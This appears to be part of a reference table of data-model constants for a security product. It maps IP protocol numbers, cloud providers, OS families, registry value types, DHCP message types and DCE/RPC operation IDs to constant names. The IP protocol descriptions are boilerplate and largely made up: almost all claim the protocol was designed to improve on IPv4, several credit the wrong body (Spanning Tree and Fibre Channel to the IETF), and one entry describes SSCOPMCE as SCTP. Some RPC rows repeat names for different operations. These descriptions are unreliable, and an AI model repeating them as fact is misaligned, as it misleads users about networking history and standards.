90 XDM_CONST.IP_PROTOCOL_SPRITE_RPC The Sprite Remote Procedure Call Protocol (Sprite RPC) is a protocol used to send messages between computers in a distributed system. It was developed by the University of California, Berkeley and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
91 XDM_CONST.IP_PROTOCOL_LARP The Locus Address Resolution Protocol (LARP) is a protocol used to send messages between computers in a distributed system. It was developed by the Xerox Corporation and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
92 XDM_CONST.IP_PROTOCOL_MTP The Multicast Transport Protocol (MTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
93 XDM_CONST.IP_PROTOCOL_AX25 The AX.25 Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Amateur Radio Relation community and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
94 XDM_CONST.IP_PROTOCOL_IPIP The Internet Protocol over Internet Protocol (IPIP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
95 XDM_CONST.IP_PROTOCOL_MICP The Mobile Internetworking Control Protocol (MICP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
96 XDM_CONST.IP_PROTOCOL_SCC_SP The Semaphore Communications Security Protocol (SCC-SP) is a protocol used to send secure messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
97 XDM_CONST.IP_PROTOCOL_ETHERIP The Ethernet over Internet Protocol (Ethernet/IP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
98 XDM_CONST.IP_PROTOCOL_ENCAP The Encapsulation Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
100 XDM_CONST.IP_PROTOCOL_GMTP The GMTP Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
101 XDM_CONST.IP_PROTOCOL_IFMP The Ipsilon Flow Management Protocol (IFMP) is a protocol used to send messages between computers in a distributed system. It was developed by the Ipsilon Networks company and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
102 XDM_CONST.IP_PROTOCOL_PNNI The Private Network-to-Network Interface (PNNI) is a protocol used to send messages between computers in a distributed system. It was developed by the ATM Forum and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
103 XDM_CONST.IP_PROTOCOL_PIM The Protocol Independent Multicast (PIM) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
104 XDM_CONST.IP_PROTOCOL_ARIS The Advanced Reliable Internet Service Protocol (ARIS) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
105 XDM_CONST.IP_PROTOCOL_SCPS The Space Communications Protocol Standards (SCPS) is a protocol used to send messages between computers in a distributed system. It was developed by the Consultative Committee for Space Data Systems (CCSDS) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
106 XDM_CONST.IP_PROTOCOL_QNX The QNX Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the QNX Software Systems company and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
107 XDM_CONST.IP_PROTOCOL_AN The A/N Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
108 XDM_CONST.IP_PROTOCOL_IPCOMP The Internet Protocol Compression Protocol (IPComp) is a protocol used to compress Internet Protocol (IP) packets in order to reduce the amount of data transmitted over a network. It was designed to be more efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
109 XDM_CONST.IP_PROTOCOL_SNP The Sitara Networks Protocol (SNP) is a protocol used to send messages between computers in a distributed system. It was developed by the Sitara Networks company and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
110 XDM_CONST.IP_PROTOCOL_COMPAQ_PEER The Compaq Peer Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Compaq company and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
111 XDM_CONST.IP_PROTOCOL_IPX_IN_IP The Internetwork Packet Exchange over Internet Protocol (IPX/IP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
112 XDM_CONST.IP_PROTOCOL_VRRP The Virtual Router Redundancy Protocol (VRRP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
113 XDM_CONST.IP_PROTOCOL_PGM The Pragmatic General Multicast (PGM) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
115 XDM_CONST.IP_PROTOCOL_L2TP The Layer 2 Tunneling Protocol (L2TP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
116 XDM_CONST.IP_PROTOCOL_DDX The D-II Data Exchange (DDX) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
117 XDM_CONST.IP_PROTOCOL_IATP The Interactive Agent Transfer Protocol (IATP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
118 XDM_CONST.IP_PROTOCOL_STP The Spanning Tree Protocol (STP) is a network protocol that is used to ensure that there are no loops in a network. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
119 XDM_CONST.IP_PROTOCOL_SRP The SpectraLink Radio Protocol (SRP) is a protocol used to send messages between computers in a distributed system. It was developed by the SpectraLink Corporation and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
120 XDM_CONST.IP_PROTOCOL_UTI The Universal Transport Interface (UTI) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
121 XDM_CONST.IP_PROTOCOL_SMP The Simple Message Protocol (SMP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
122 XDM_CONST.IP_PROTOCOL_SM The Simple Multicast Protocol (SM) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
123 XDM_CONST.IP_PROTOCOL_PTP The Performance Transparency Protocol (PTP) is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
124 XDM_CONST.IP_PROTOCOL_ISIS The Intermediate System to Intermediate System (ISIS) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the International Organization for Standardization (ISO) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
125 XDM_CONST.IP_PROTOCOL_FIRE FIRE is a protocol for transporting data between a pair of hosts, with a focus on low latency.
126 XDM_CONST.IP_PROTOCOL_CRTP The Combat Radio Transport Protocol (CRTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
127 XDM_CONST.IP_PROTOCOL_CRUDP The Combat Radio User Datagram Protocol (CRUDP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
128 XDM_CONST.IP_PROTOCOL_SSCOPMCE The Stream Control Transmission Protocol (SCTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
129 XDM_CONST.IP_PROTOCOL_IPLT The IP Layer Transport Protocol (IPLT) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
130 XDM_CONST.IP_PROTOCOL_SPS The Secure Packet Shield (SPS) Protocol is a protocol used to send messages between computers in a distributed system. It was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
131 XDM_CONST.IP_PROTOCOL_PIPE PIPE is a protocol used to provide in-kernel messaging between system processes.
132 XDM_CONST.IP_PROTOCOL_SCTP The Stream Control Transmission Protocol (SCTP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
133 XDM_CONST.IP_PROTOCOL_FC The Fibre Channel Protocol (FCP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
134 XDM_CONST.IP_PROTOCOL_RSVP_E2E_IGNORE The Resource ReSerVation Protocol (RSVP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
135 XDM_CONST.IP_PROTOCOL_MOBILITY The Mobility Header (MH) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
136 XDM_CONST.IP_PROTOCOL_UDPLITE The User Datagram Protocol Lite (UDPLite) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
137 XDM_CONST.IP_PROTOCOL_MPLS_IN_IP Multiprotocol Label Switching (MPLS) is a mechanism used to speed up and shape traffic flows in a network. MPLS in IP is a way to encapsulate MPLS packets inside IP packets for transport across an IP network.
138 XDM_CONST.IP_PROTOCOL_MANET The Mobile Ad-hoc NETwork (MANET) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
139 XDM_CONST.IP_PROTOCOL_HIP The Host Identity Protocol (HIP) is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
140 XDM_CONST.IP_PROTOCOL_SHIM6 The Site Multihoming by IPv6 Intermediation (Shim6) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
141 XDM_CONST.IP_PROTOCOL_WESP The Wrapped Encapsulating Security Payload (WESP) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
142 XDM_CONST.IP_PROTOCOL_ROHC The Robust Header Compression (ROHC) Protocol is a protocol used to send messages between computers in a distributed system. It was developed by the Internet Engineering Task Force (IETF) and was designed to be more reliable and efficient than the older IPv4 protocol, which had become inadequate due to the explosive growth of the Internet.
3.6 | XDM_CONST.CLOUD_PROVIDER
A cloud provider.
AWS XDM_CONST.CLOUD_PROVIDER_AWS
GCP XDM_CONST.CLOUD_PROVIDER_GCP
AZURE XDM_CONST.CLOUD_PROVIDER_AZURE
ALIBABA XDM_CONST.CLOUD_PROVIDER_ALIBABA
ON_PREM XDM_CONST.CLOUD_PROVIDER_ON_PREM
3.7 | XDM_CONST.OS_FAMILY
An operating system.
WINDOWS XDM_CONST.OS_FAMILY_WINDOWS A popular operating system developed by Microsoft that runs on personal computers and servers.
MACOS XDM_CONST.OS_FAMILY_MACOS The operating system that runs on Apple's Mac computers.
LINUX XDM_CONST.OS_FAMILY_LINUX A free and open-source operating system that runs on a wide range of devices, including personal computers, servers, and embedded systems.
ANDROID XDM_CONST.OS_FAMILY_ANDROID A mobile operating system developed by Google that is based on the Linux kernel. It is primarily used on smartphones and tablets.
IOS XDM_CONST.OS_FAMILY_IOS A mobile operating system developed by Apple that runs on iPhones and iPads.
UBUNTU XDM_CONST.OS_FAMILY_UBUNTU A free and open-source operating system based on the Linux kernel. It is popular among users who prefer a user-friendly interface and a wide range of software options.
DEBIAN XDM_CONST.OS_FAMILY_DEBIAN A free and open-source operating system based on the Linux kernel. It is known for its stability and large repository of software packages.
FEDORA XDM_CONST.OS_FAMILY_FEDORA A free and open-source operating system based on the Linux kernel. It is known for its focus on cutting-edge technologies and a commitment to free software.
CENTOS XDM_CONST.OS_FAMILY_CENTOS A free and open-source operating system based on the Linux kernel. It is often used as a base for other operating systems and is known for its stability and long-term support.
CHROMEOS XDM_CONST.OS_FAMILY_CHROMEOS A lightweight operating system developed by Google that is based on the Linux kernel. It is primarily used on Chromebooks and other devices with limited hardware resources.
SOLARIS XDM_CONST.OS_FAMILY_SOLARIS A proprietary operating system developed by Oracle that is based on the Unix operating system. It is often used on servers and other high-end systems.
SCADA XDM_CONST.OS_FAMILY_SCADA A type of industrial control system that is used to monitor and control large-scale industrial processes, such as power generation, oil and gas production, and water treatment.
3.8 | XDM_CONST.AGENT_TYPE
An agent type.
REGULAR XDM_CONST.AGENT_TYPE_REGULAR
COLLECTOR XDM_CONST.AGENT_TYPE_COLLECTOR
VDI XDM_CONST.AGENT_TYPE_VDI
CLOUD XDM_CONST.AGENT_TYPE_CLOUD
3.9 | XDM_CONST.SIGNATURE_STATUS
A signature status.
UNSIGNED XDM_CONST.SIGNATURE_STATUS_UNSIGNED
SIGNED_INVALID XDM_CONST.SIGNATURE_STATUS_SIGNED_INVALID
SIGNED_VERIFIED XDM_CONST.SIGNATURE_STATUS_SIGNED_VERIFIED
STATUS_UNKNOWN XDM_CONST.SIGNATURE_STATUS_STATUS_UNKNOWN
3.10 | XDM_CONST.REGISTRY_VALUE_TYPE
Registry value type. See https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-value-types.
REG_DWORD_LITTLE_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_LITTLE_ENDIAN A 32-bit number in little-endian format. Windows is designed to run on little-endian computer architectures. Therefore, this value is defined as REG_DWORD in the Windows header files.
REG_DWORD_BIG_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_DWORD_BIG_ENDIAN A 32-bit number in big-endian format. Some UNIX systems support big-endian architectures.
REG_EXPAND_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_EXPAND_SZ A null-terminated string that contains unexpanded references to environment variables (for example, "%PATH%"). It will be a Unicode or ANSI string depending on whether you use the Unicode or ANSI functions. To expand the environment variable references, use the ExpandEnvironmentStrings function.
REG_LINK XDM_CONST.REGISTRY_VALUE_TYPE_REG_LINK A null-terminated Unicode string that contains the target path of a symbolic link that was created by calling the RegCreateKeyEx function with REG_OPTION_CREATE_LINK.
REG_MULTI_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_MULTI_SZ A sequence of null-terminated strings, terminated by an empty string (\0). The following is an example: String1\0String2\0String3\0LastString\0\0 The first \0 terminates the first string, the second to the last \0 terminates the last string, and the final \0 terminates the sequence. Note that the final terminator must be factored into the length of the string.
REG_QWORD_LITTLE_ENDIAN XDM_CONST.REGISTRY_VALUE_TYPE_REG_QWORD_LITTLE_ENDIAN A 64-bit number in little-endian format. Windows is designed to run on little-endian computer architectures. Therefore, this value is defined as REG_QWORD in the Windows header files.
REG_SZ XDM_CONST.REGISTRY_VALUE_TYPE_REG_SZ A null-terminated string. This will be either a Unicode or an ANSI string, depending on whether you use the Unicode or ANSI functions.
3.11 | XDM_CONST.HTTP_METHOD
The HTTP method. See https://www.iana.org/assignments/http-methods/http-methods.xhtml
MKCOL XDM_CONST.HTTP_METHOD_MKCOL RFC4918, Section 9.3, RFC5689, Section 3, RFC8144, Section 2.3
3.12 | XDM_CONST.HTTP_RSP_CODE
The HTTP response code.
3.13 | XDM_CONST.DHCP_MESSAGE_TYPE
1 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDISCOVER [RFC2132]
2 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPOFFER [RFC2132]
3 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPREQUEST [RFC2132]
4 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPDECLINE [RFC2132]
5 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPACK [RFC2132]
6 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPNAK [RFC2132]
7 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPRELEASE [RFC2132]
8 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPINFORM [RFC2132]
9 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPFORCERENEW [RFC3203]
10 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERY [RFC4388]
11 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEUNASSIGNED [RFC4388]
12 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEUNKNOWN [RFC4388]
13 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEACTIVE [RFC4388]
14 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPBULKLEASEQUERY [RFC6926]
15 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERYDONE [RFC6926]
16 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPACTIVELEASEQUERY [RFC7724]
17 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPLEASEQUERYSTATUS [RFC7724]
18 XDM_CONST.DHCP_MESSAGE_TYPE_DHCPTLS [RFC7724]
3.14 | XDM_CONST.DCERPC_OPERATION
RPC endpoints
1ff70682-0a51-30e8-076d-740be8cee98b:0 XDM_CONST.DCERPC_OPERATION_NETR_JOB_ADD
1ff70682-0a51-30e8-076d-740be8cee98b:1 XDM_CONST.DCERPC_OPERATION_NETR_JOB_DEL
1ff70682-0a51-30e8-076d-740be8cee98b:2 XDM_CONST.DCERPC_OPERATION_NETR_JOB_ENUM
1ff70682-0a51-30e8-076d-740be8cee98b:3 XDM_CONST.DCERPC_OPERATION_NETR_JOB_GET_INFO
378e52b0-c0a9-11cf-822d-00aa0051e40f:0 XDM_CONST.DCERPC_OPERATION_SA_SET_ACCOUNT_INFORMATION
378e52b0-c0a9-11cf-822d-00aa0051e40f:1 XDM_CONST.DCERPC_OPERATION_SA_SET_NS_ACCOUNT_INFORMATION
378e52b0-c0a9-11cf-822d-00aa0051e40f:2 XDM_CONST.DCERPC_OPERATION_SA_GET_NS_ACCOUNT_INFORMATION
378e52b0-c0a9-11cf-822d-00aa0051e40f:3 XDM_CONST.DCERPC_OPERATION_SA_GET_ACCOUNT_INFORMATION
0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:0 XDM_CONST.DCERPC_OPERATION_IT_SRV_REGISTER_IDLE_TASK
0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:1 XDM_CONST.DCERPC_OPERATION_IT_SRV_UNREGISTER_IDLE_TASK
0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:2 XDM_CONST.DCERPC_OPERATION_IT_SRV_PROCESS_IDLE_TASKS
0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53:3 XDM_CONST.DCERPC_OPERATION_IT_SRV_SET_DETECTION_PARAMETERS
86d35949-83c9-4044-b424-db363231fd0c:0 XDM_CONST.DCERPC_OPERATION_SCH_RPC_HIGHEST_VERSION
86d35949-83c9-4044-b424-db363231fd0c:1 XDM_CONST.DCERPC_OPERATION_SCH_RPC_REGISTER_TASK
86d35949-83c9-4044-b424-db363231fd0c:2 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RETRIEVE_TASK
86d35949-83c9-4044-b424-db363231fd0c:3 XDM_CONST.DCERPC_OPERATION_SCH_RPC_CREATE_FOLDER
86d35949-83c9-4044-b424-db363231fd0c:4 XDM_CONST.DCERPC_OPERATION_SCH_RPC_SET_SECURITY
86d35949-83c9-4044-b424-db363231fd0c:5 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_SECURITY
86d35949-83c9-4044-b424-db363231fd0c:6 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_FOLDER
86d35949-83c9-4044-b424-db363231fd0c:7 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_TASKS
86d35949-83c9-4044-b424-db363231fd0c:8 XDM_CONST.DCERPC_OPERATION_SCH_RPC_ENUM_INSTANCES
86d35949-83c9-4044-b424-db363231fd0c:9 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_INSTANCE_INFO
86d35949-83c9-4044-b424-db363231fd0c:10 XDM_CONST.DCERPC_OPERATION_SCH_RPC_STOP_INSTANCE
86d35949-83c9-4044-b424-db363231fd0c:11 XDM_CONST.DCERPC_OPERATION_SCH_RPC_STOP
86d35949-83c9-4044-b424-db363231fd0c:12 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RUN
86d35949-83c9-4044-b424-db363231fd0c:13 XDM_CONST.DCERPC_OPERATION_SCH_RPC_DELETE
86d35949-83c9-4044-b424-db363231fd0c:14 XDM_CONST.DCERPC_OPERATION_SCH_RPC_RENAME
86d35949-83c9-4044-b424-db363231fd0c:15 XDM_CONST.DCERPC_OPERATION_SCH_RPC_SCHEDULED_RUNTIMES
86d35949-83c9-4044-b424-db363231fd0c:16 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_LAST_RUN_INFO
86d35949-83c9-4044-b424-db363231fd0c:17 XDM_CONST.DCERPC_OPERATION_SCH_RPC_GET_TASK_INFO
99fcfec4-5260-101b-bbcb-00aa0021347a:0 XDM_CONST.DCERPC_OPERATION_RESOLVE_OXID
99fcfec4-5260-101b-bbcb-00aa0021347a:1 XDM_CONST.DCERPC_OPERATION_SIMPLE_PING
99fcfec4-5260-101b-bbcb-00aa0021347a:2 XDM_CONST.DCERPC_OPERATION_COMPLEX_PING
99fcfec4-5260-101b-bbcb-00aa0021347a:3 XDM_CONST.DCERPC_OPERATION_SERVER_ALIVE
99fcfec4-5260-101b-bbcb-00aa0021347a:4 XDM_CONST.DCERPC_OPERATION_RESOLVE_OXID2
99fcfec4-5260-101b-bbcb-00aa0021347a:5 XDM_CONST.DCERPC_OPERATION_SERVER_ALIVE2
4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0 XDM_CONST.DCERPC_OPERATION_REMOTE_ACTIVATION
f5cc5a18-4264-101a-8c59-08002b2f8426:0 XDM_CONST.DCERPC_OPERATION_NSPI_BIND
f5cc5a18-4264-101a-8c59-08002b2f8426:1 XDM_CONST.DCERPC_OPERATION_NSPI_UNBIND
f5cc5a18-4264-101a-8c59-08002b2f8426:2 XDM_CONST.DCERPC_OPERATION_NSPI_UPDATE_STAT
f5cc5a18-4264-101a-8c59-08002b2f8426:3 XDM_CONST.DCERPC_OPERATION_NSPI_QUERY_ROWS
f5cc5a18-4264-101a-8c59-08002b2f8426:4 XDM_CONST.DCERPC_OPERATION_NSPI_SEEK_ENTRIES
f5cc5a18-4264-101a-8c59-08002b2f8426:5 XDM_CONST.DCERPC_OPERATION_NSPI_GET_MATCHES
f5cc5a18-4264-101a-8c59-08002b2f8426:6 XDM_CONST.DCERPC_OPERATION_NSPI_RESORT_RESTRICTION
f5cc5a18-4264-101a-8c59-08002b2f8426:7 XDM_CONST.DCERPC_OPERATION_NSPI_DN_TO_EPH
f5cc5a18-4264-101a-8c59-08002b2f8426:8 XDM_CONST.DCERPC_OPERATION_NSPI_GET_PROP_LIST
f5cc5a18-4264-101a-8c59-08002b2f8426:9 XDM_CONST.DCERPC_OPERATION_NSPI_GET_PROPS
9556dc99-828c-11cf-a37e-00aa003240c7:3 XDM_CONST.DCERPC_OPERATION_OPEN_NAMESPACE
9556dc99-828c-11cf-a37e-00aa003240c7:4 XDM_CONST.DCERPC_OPERATION_CANCEL_ASYNC_CALL
9556dc99-828c-11cf-a37e-00aa003240c7:5 XDM_CONST.DCERPC_OPERATION_QUERY_OBJECT_SINK
9556dc99-828c-11cf-a37e-00aa003240c7:6 XDM_CONST.DCERPC_OPERATION_GET_OBJECT
9556dc99-828c-11cf-a37e-00aa003240c7:7 XDM_CONST.DCERPC_OPERATION_GET_OBJECT_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:8 XDM_CONST.DCERPC_OPERATION_PUT_CLASS
9556dc99-828c-11cf-a37e-00aa003240c7:9 XDM_CONST.DCERPC_OPERATION_PUT_CLASS_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:10 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS
9556dc99-828c-11cf-a37e-00aa003240c7:11 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:12 XDM_CONST.DCERPC_OPERATION_CREATE_CLASS_ENUM
9556dc99-828c-11cf-a37e-00aa003240c7:13 XDM_CONST.DCERPC_OPERATION_CREATE_CLASS_ENUM_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:14 XDM_CONST.DCERPC_OPERATION_PUT_INSTANCE
9556dc99-828c-11cf-a37e-00aa003240c7:15 XDM_CONST.DCERPC_OPERATION_PUT_INSTANCE_ASYNC
Original Mapped Description
9556dc99-828c-11cf-a37e-00aa003240c7:16 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS
9556dc99-828c-11cf-a37e-00aa003240c7:17 XDM_CONST.DCERPC_OPERATION_DELETE_CLASS_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:18 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE_ENUM
9556dc99-828c-11cf-a37e-00aa003240c7:19 XDM_CONST.DCERPC_OPERATION_CREATE_INSTANCE_ENUM_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:20 XDM_CONST.DCERPC_OPERATION_EXEC_QUERY
9556dc99-828c-11cf-a37e-00aa003240c7:21 XDM_CONST.DCERPC_OPERATION_EXEC_QUERY_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:22 XDM_CONST.DCERPC_OPERATION_EXEC_NOTIFICATION_QUERY
9556dc99-828c-11cf-a37e-00aa003240c7:23 XDM_CONST.DCERPC_OPERATION_EXEC_NOTIFICATION_QUERY_ASYNC
9556dc99-828c-11cf-a37e-00aa003240c7:24 XDM_CONST.DCERPC_OPERATION_EXEC_METHOD
9556dc99-828c-11cf-a37e-00aa003240c7:25 XDM_CONST.DCERPC_OPERATION_EXEC_METHOD_ASYNC
f309ad18-d86a-11d0-a075-00c04fb68820:3 XDM_CONST.DCERPC_OPERATION_ESTABLISH_POSITION
f309ad18-d86a-11d0-a075-00c04fb68820:4 XDM_CONST.DCERPC_OPERATION_REQUEST_CHALLENGE
f309ad18-d86a-11d0-a075-00c04fb68820:5 XDM_CONST.DCERPC_OPERATION_WBEM_LOGIN
f309ad18-d86a-11d0-a075-00c04fb68820:6 XDM_CONST.DCERPC_OPERATION_NTLM_LOGIN
f5cc59b4-4264-101a-8c59-08002b2f8426:0 XDM_CONST.DCERPC_OPERATION_FRS_RPC_SEND_COMM_PKT
f5cc59b4-4264-101a-8c59-08002b2f8426:1 XDM_CONST.DCERPC_OPERATION_FRS_RPC_VERIFY_PROMOTION_PARENT
f5cc59b4-4264-101a-8c59-08002b2f8426:2 XDM_CONST.DCERPC_OPERATION_FRS_RPC_START_PROMOTION_PARENT
f5cc59b4-4264-101a-8c59-08002b2f8426:3 XDM_CONST.DCERPC_OPERATION_FRS_NOP
f5cc59b4-4264-101a-8c59-08002b2f8426:4 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:5 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:6 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:7 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:8 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:9 XDM_CONST.DCERPC_OPERATION_FRS_BACKUP_COMPLETE
f5cc59b4-4264-101a-8c59-08002b2f8426:10 XDM_CONST.DCERPC_OPERATION_FRS_RPC_VERIFY_PROMOTION_PARENT_EX
00000143-0000-0000-c000-000000000046:0 XDM_CONST.DCERPC_OPERATION_QUERY_INTERFACE
00000143-0000-0000-c000-000000000046:1 XDM_CONST.DCERPC_OPERATION_ADD_REF
